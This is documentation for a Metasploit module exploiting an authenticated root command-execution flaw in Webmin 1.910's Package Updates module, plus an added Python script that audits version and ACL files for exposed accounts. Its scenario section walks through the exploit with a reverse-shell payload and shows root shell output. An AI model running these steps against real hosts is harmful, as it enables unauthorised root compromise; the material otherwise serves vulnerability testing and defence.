Description
This module exploits an arbitrary command execution vulnerability in Webmin 1.910 and lower versions. Any user authorized to use the "Package Updates" module can execute arbitrary commands with root privileges via the data parameter to update.cgi.
Vulnerable Application
This module has been tested with Webmin 1.910.
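An exposure check for the condition described above, added here as an example (it is not part of the module or its documentation): it reports which accounts are granted Package Updates on an install in the affected version range. It assumes Webmin's usual `user: module module ...` layout in `/etc/webmin/webmin.acl` and a bare version string in `/etc/webmin/version`; the sample contents and function names are constructed for illustration.

```python
# Added example; sample file contents are constructed, not from a real host.
AFFECTED_MAX = (1, 910)      # page: "Webmin 1.910 and lower versions"
MODULE = "package-updates"   # module directory shown in the page's pwd output

# Assumed default locations: /etc/webmin/version and /etc/webmin/webmin.acl
SAMPLE_VERSION = "1.910\n"
SAMPLE_ACL = """\
root: acl cron package-updates useradmin webmin
rce: package-updates
backup: fsdump cron
"""


def parse_version(text):
    """Turn '1.910' into (1, 910) so versions compare numerically."""
    try:
        return tuple(int(part) for part in text.strip().split("."))
    except ValueError:
        raise ValueError(f"unrecognised Webmin version: {text!r}") from None


def users_with_module(acl_text, module=MODULE):
    """Return users whose ACL line grants exactly the named module."""
    users = []
    for line in acl_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        user, _, modules = line.partition(":")
        # Whole-token match, so 'package-updates-extra' would not count.
        if module in modules.split():
            users.append(user.strip())
    return users


def audit(version_text, acl_text):
    """Report whether the install is in the affected range and who can reach the module."""
    version = parse_version(version_text)
    affected = version <= AFFECTED_MAX
    exposed = users_with_module(acl_text) if affected else []
    return {"version": version, "affected": affected, "exposed_users": exposed}


if __name__ == "__main__":
    print(audit(SAMPLE_VERSION, SAMPLE_ACL))
```

On a real host, pass the contents of the two files to `audit()`; every account it lists other than the intended administrators is one whose Package Updates grant should be reviewed.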
Verification Steps
use exploit/linux/http/webmin_packageup_rce
set rhosts <rhost>
set username <username>
set password <password>
exploit
Scenarios
Tested Webmin 1.910 on Debian Linux 4.19.28-2kali1 x64
msf5 >
msf5 > use exploit/linux/http/webmin_packageup_rce
msf5 exploit(linux/http/webmin_packageup_rce) > set RHOSTS 192.168.1.9
RHOSTS => 192.168.1.9
msf5 exploit(linux/http/webmin_packageup_rce) > set PAYLOAD cmd/unix/reverse_python
PAYLOAD => cmd/unix/reverse_python
msf5 exploit(linux/http/webmin_packageup_rce) > set LHOST 192.168.1.12
LHOST => 192.168.1.12
msf5 exploit(linux/http/webmin_packageup_rce) > set USERNAME rce
USERNAME => rce
msf5 exploit(linux/http/webmin_packageup_rce) > set PASSWORD password
PASSWORD => password
msf5 exploit(linux/http/webmin_packageup_rce) > check
[*] NICE! rce has the right to >>Package Update<<
[+] 192.168.1.9:10000 - The target is vulnerable.
msf5 exploit(linux/http/webmin_packageup_rce) > exploit
[*] Started reverse TCP handler on 192.168.1.12:4444
[+] Session cookie: 1947b5dfd62403b8f1f58f497e88b1e5
[*] Attempting to execute the payload...
[*] Command shell session 12 opened (192.168.1.12:4444 -> 192.168.1.9:47552) at 2019-06-16 18:21:46 -0400
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux AkkuS 4.19.0-kali4-amd64 #1 SMP Debian 4.19.28-2kali1 (2019-03-18) x86_64 GNU/Linux
pwd
/usr/share/webmin/package-updates/
exit